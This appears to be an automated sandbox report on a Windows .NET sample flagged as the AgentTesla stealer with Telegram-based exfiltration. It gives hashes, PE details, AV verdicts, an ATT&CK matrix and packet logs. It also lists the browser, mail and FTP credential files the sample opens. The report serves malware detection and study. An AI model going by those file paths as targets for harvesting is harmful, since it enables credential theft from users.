              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\ttrpym.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_00415B06 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_00415B06
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_012BABDE GetUserNameW,3_2_012BABDE
              Source: C:\Users\user\Desktop\ttrpym.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              Yara detected AgentTesla
              Source: Yara match File source: 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000003.00000002.614226904.0000000000F82000.00000020.00000001.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: ttrpym.exe PID: 6732, type: MEMORY
              Source: Yara match File source: 3.2.ttrpym.exe.f80000.2.unpack, type: UNPACKEDPE
              Yara detected Telegram RAT
              Source: Yara match File source: Process Memory Space: ttrpym.exe PID: 6732, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\ttrpym.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\ttrpym.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\Desktop\ttrpym.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\ttrpym.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
              Source: C:\Users\user\Desktop\ttrpym.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Tries to steal Mail credentials (via file access)
              Source: C:\Users\user\Desktop\ttrpym.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: Yara match File source: 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: ttrpym.exe PID: 6732, type: MEMORY

              Remote Access Functionality:

              Yara detected AgentTesla
              Source: Yara match File source: 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000003.00000002.614226904.0000000000F82000.00000020.00000001.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: ttrpym.exe PID: 6732, type: MEMORY
              Source: Yara match File source: 3.2.ttrpym.exe.f80000.2.unpack, type: UNPACKEDPE
              Yara detected Telegram RAT
              Source: Yara match File source: Process Memory Space: ttrpym.exe PID: 6732, type: MEMORY

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Windows Management Instrumentation 211 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 11 | OS Credential Dumping 2 | System Time Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Web Service 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Native API 21 | Boot or Logon Initialization Scripts | Access Token Manipulation 1 | Deobfuscate/Decode Files or Information 11 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection 12 | Obfuscated Files or Information 3 | Security Account Manager | System Information Discovery 124 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Encrypted Channel 12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 13 | NTDS | Query Registry 1 | Distributed Component Object Model | Clipboard Data 1 | Scheduled Transfer | Non-Application Layer Protocol 1 | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading 1 | LSA Secrets | Security Software Discovery 241 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 2 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 13 | DCSync | Process Discovery 3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation 1 | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
              Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 12 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
              Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label | Link
              ttrpym.exe | 50% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
              ttrpym.exe | 100% | Joe Sandbox ML | |

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              Source | Detection | Scanner | Label | Link | Download
              3.2.ttrpym.exe.f80000.2.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File

              Domains

              No Antivirus matches

              URLs


              Domains and IPs

              Contacted Domains

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              api.telegram.org | 149.154.167.220 | true | false | | high

                URLs from Memory and Binaries

                                                                    high
                                                                    http://www.carterandcone.comddttrpym.exe, 00000000.00000003.239779476.0000000005E7B000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers/cabarga.htmlNttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://pmTUNK.comttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.founder.com.cn/cnttrpym.exe, 00000000.00000003.239436981.0000000005E7B000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.carterandcone.comhlyttrpym.exe, 00000000.00000003.238931261.0000000005E7B000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.fontbureau.com/designers/cabarga.htmlttrpym.exe, 00000000.00000003.245848821.0000000005E9E000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://www.monotype.ttrpym.exe, 00000000.00000003.243086872.0000000005E7D000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.fontbureau.commttrpym.exe, 00000000.00000002.264530973.00000000016D7000.00000004.00000040.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.jiyu-kobo.co.jp/ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://crl.godaddy.com/gdroot.crl0Fttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://www.carterandcone.comEacdWttrpym.exe, 00000000.00000003.240021767.0000000005E7B000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.fontbureau.com/designers8ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://www.carterandcone.comt;Fttrpym.exe, 00000000.00000003.239436981.0000000005E7B000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            low
                                                                            http://cert.sttrpym.exe, 00000003.00000003.522255884.0000000007DEC000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.fontbureau.com/designers/mttrpym.exe, 00000000.00000003.243841900.0000000005E7D000.00000004.00000001.sdmpfalse
                                                                              high

                                                                              Contacted IPs


                                                                              Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
149.154.167.220 | unknown | United Kingdom | | 62041 | TELEGRAMRU | false

                                                                              Private

                                                                              IP
                                                                              192.168.2.1

                                                                              General Information

                                                                              Joe Sandbox Version:31.0.0 Emerald
                                                                              Analysis ID:345001
                                                                              Start date:27.01.2021
                                                                              Start time:15:38:48
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 9m 8s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Sample file name:ttrpym.exe
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                              Number of analysed new started processes analysed:23
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@3/2@26/2
                                                                              EGA Information:Failed
                                                                              HDC Information:
                                                                              • Successful, ratio: 5.9% (good quality ratio 5.8%)
                                                                              • Quality average: 90.8%
                                                                              • Quality standard deviation: 21%
                                                                              HCA Information:
                                                                              • Successful, ratio: 75%
                                                                              • Number of executed functions: 145
                                                                              • Number of non-executed functions: 18
                                                                              Cookbook Comments:
                                                                              • Adjust boot time
                                                                              • Enable AMSI
                                                                              • Found application associated with file extension: .exe
                                                                              Warnings:
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/345001/sample/ttrpym.exe

                                                                              Simulations

                                                                              Behavior and APIs

Time | Type | Description
15:39:49 | API Interceptor | 1008x Sleep call for process: ttrpym.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs


                                                                                                                      Domains


                                                                                                                      ASN


                                                                                                                      JA3 Fingerprints

Match: 3b5074b1b5d032e5620f69f9f700ff0e

Associated Sample Name / URL | Detection | Context
roboforex4multisetup.exe | malicious | 149.154.167.220
MV TAN BINH 135.pdf.exe | malicious | 149.154.167.220
SecuriteInfo.com.Variant.Zusy.363976.7571.exe | malicious | 149.154.167.220
SecuriteInfo.com.Trojan.PackedNET.519.21836.exe | malicious | 149.154.167.220
RFQ RPM202011-776JD.jpg.lnk | malicious | 149.154.167.220
8Aobnx1VRi.exe | malicious | 149.154.167.220
RFQ-Strip Casting Line.exe | malicious | 149.154.167.220
NEW ORDER PO 20200909.exe | malicious | 149.154.167.220
U1G3qA2l4I.exe | malicious | 149.154.167.220
file.exe | malicious | 149.154.167.220
file.exe | malicious | 149.154.167.220
Updated Invoice{swift..exe | malicious | 149.154.167.220
SecuriteInfo.com.BehavesLike.Win32.Generic.mh.exe | malicious | 149.154.167.220
file.exe | malicious | 149.154.167.220
RFQ #6553928_PDF.exe | malicious | 149.154.167.220
SPpfYOx5Ju.exe | malicious | 149.154.167.220
MTD INVOICE.exe | malicious | 149.154.167.220
file.exe | malicious | 149.154.167.220
Online_doc20.01.exe | malicious | 149.154.167.220
090008000000000000.exe | malicious | 149.154.167.220

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ttrpym.exe.log
Process: C:\Users\user\Desktop\ttrpym.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5: FED34146BF2F2FA59DCF8702FCC8232E
SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious: true
Reputation: high, very likely benign file
                                                                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                                      C:\Users\user\AppData\Roaming\nozq152y.bbo\Chrome\Default\Cookies
Process: C:\Users\user\Desktop\ttrpym.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.6969296358976265
Encrypted: false
SSDEEP: 24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBo2+tYeF+X:T5LLOpEO5J/Kn7U1uBo2UYeQ
MD5: A9DBC7B8E523ABE3B02D77DBF2FCD645
SHA1: DF5EE16ECF4B3B02E312F935AE81D4C5D2E91CA8
SHA-256: 39B4E45A062DEA6F541C18FA1A15C5C0DB43A59673A26E2EB5B8A4345EE767AE
SHA-512: 3CF87455263E395313E779D4F440D8405D86244E04B5F577BB9FA2F4A2069DE019D340F6B2F6EF420DEE3D3DEEFD4B58DA3FCA3BB802DE348E1A810D6379CC3B
Malicious: false
Reputation: moderate, very likely benign file

                                                                                                                      Static File Info

                                                                                                                      General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.961464624984834
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: ttrpym.exe
File size: 907776
MD5: 3b53c639bd8ea883e5036a040f833415
SHA1: af2f707e2e787879a67994fbad96c3e2f418dd3a
SHA256: eca6a35d952f84597c3917f4c77f8c0e2cdeea6101caa97906dc1904e6f9e0ea
SHA512: d4788d45a4d9f240b1a1a39662af2e2ade354d8d2b2d6abc0488536f5e0f24531457fdba5ab2c8ea89cb359616ef83d774d52655e2281d46f63870972522b833
SSDEEP: 24576:5pVLHCXj6FjdUXDvOTmNjfUeNp8b/1TR01bNP8VZ:53LH+uddUTvOEzUC21TROb98V

                                                                                                                      File Icon

                                                                                                                      Icon Hash:00828e8e8686b000

                                                                                                                      Static PE Info

                                                                                                                      General

Entrypoint: 0x4def2a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x6010ACC3 [Tue Jan 26 23:58:59 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al

                                                                                                                      Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdeed8 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe0000 | 0x58c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe2000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                                                      Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xdcf30 | 0xdd000 | False | 0.963299367223 | data | 7.96541170313 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xe0000 | 0x58c | 0x600 | False | 0.414713541667 | data | 4.04029792959 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe2000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xe0090 | 0x2fc | data | |
RT_MANIFEST | 0xe039c | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                                                                                      Imports

DLL | Import
mscoree.dll | _CorExeMain

                                                                                                                      Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2018
Assembly Version | 1.0.0.0
InternalName | o.exe
FileVersion | 1.0.0.0
CompanyName |
LegalTrademarks |
Comments |
ProductName | MathLib
ProductVersion | 1.0.0.0
FileDescription | MathLib
OriginalFilename | o.exe

                                                                                                                      Network Behavior

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                      Jan 27, 2021 15:40:36.993676901 CET44349744149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:36.993690968 CET44349744149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:36.993705988 CET44349744149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:36.993720055 CET49744443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:37.044990063 CET44349744149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:37.045398951 CET44349744149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:37.045434952 CET44349744149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:37.045452118 CET44349744149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:37.045558929 CET44349744149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:37.045582056 CET44349744149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:37.045595884 CET44349744149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:37.170731068 CET44349744149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:37.170762062 CET44349744149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:37.170867920 CET49744443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:41.995155096 CET49744443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:42.047862053 CET44349744149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.047945976 CET49744443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:42.095539093 CET49752443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:42.147506952 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.147627115 CET49752443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:42.149071932 CET49752443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:42.198638916 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.198674917 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.198688030 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.198708057 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.198719025 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.198800087 CET49752443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:42.198853016 CET49752443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:42.199759960 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.199788094 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.199875116 CET49752443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:42.202347040 CET49752443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:42.252374887 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.254950047 CET49752443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:42.304723978 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.305475950 CET49752443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:42.357700109 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.357722044 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.357822895 CET49752443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:42.357903957 CET49752443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:42.358336926 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.358431101 CET49752443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:42.410060883 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.410088062 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.410100937 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.410113096 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.410307884 CET49752443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:42.410423040 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.410489082 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.410991907 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.462668896 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.462733030 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.462776899 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.462953091 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.462994099 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.463160038 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.463212013 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.600490093 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.600527048 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.600603104 CET49752443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:47.200490952 CET49752443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:47.250904083 CET44349752149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:47.251065969 CET49752443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:47.311575890 CET49753443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:47.361155987 CET44349753149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:47.361268044 CET49753443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:47.362289906 CET49753443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:47.411694050 CET44349753149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:47.411834002 CET44349753149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:47.411859989 CET44349753149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:47.411881924 CET44349753149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:47.411891937 CET44349753149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:47.411952972 CET49753443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:40:47.413180113 CET44349753149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:47.413208008 CET44349753149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:47.413280010 CET49753443192.168.2.7149.154.167.220
